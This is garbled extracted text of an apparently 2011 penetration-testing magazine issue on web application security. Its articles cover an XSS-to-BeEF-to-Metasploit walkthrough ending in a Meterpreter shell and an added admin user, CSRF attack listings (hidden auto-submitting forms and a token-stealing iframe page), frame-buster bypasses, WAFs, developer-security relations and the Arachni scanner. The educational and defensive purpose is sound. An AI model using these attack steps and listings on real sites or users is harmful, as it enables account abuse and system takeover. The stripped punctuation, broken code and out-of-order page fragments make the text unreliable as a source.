Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
